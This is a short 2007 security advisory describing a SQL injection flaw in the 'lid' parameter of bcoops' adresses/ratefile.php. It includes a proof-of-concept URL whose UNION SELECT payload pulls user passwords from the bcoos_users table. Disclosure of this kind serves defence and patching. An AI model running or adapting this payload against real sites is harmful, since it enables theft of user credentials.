########################################################
Bcoops adresses/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-adressesratefilephp-lid-variable.html
vendor notify:NO exploits available: YES
########################################################



bcoos is content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the script not
properly sanitizing user-supplied input to the 'lid' variable,
and adresses/ratefile.php script.This may allow an attacker to
inject or manipulate SQL queries in the backend database.



#################
Versions:
#################

bcoops 1.0.10 =< vulnerable

#################
Solution:
#################

No solution at this time !!!
Try to edit the source code
or Try another product

#################
Timeline:
#################

Discovered:25-11-2007
vendor notify:--------
vendor response:-------
disclosure:30-11-2007


#################
SQL intections:
#################


http://localhost/bcoops/modules/adresses/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201



####################### €nd ##############################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....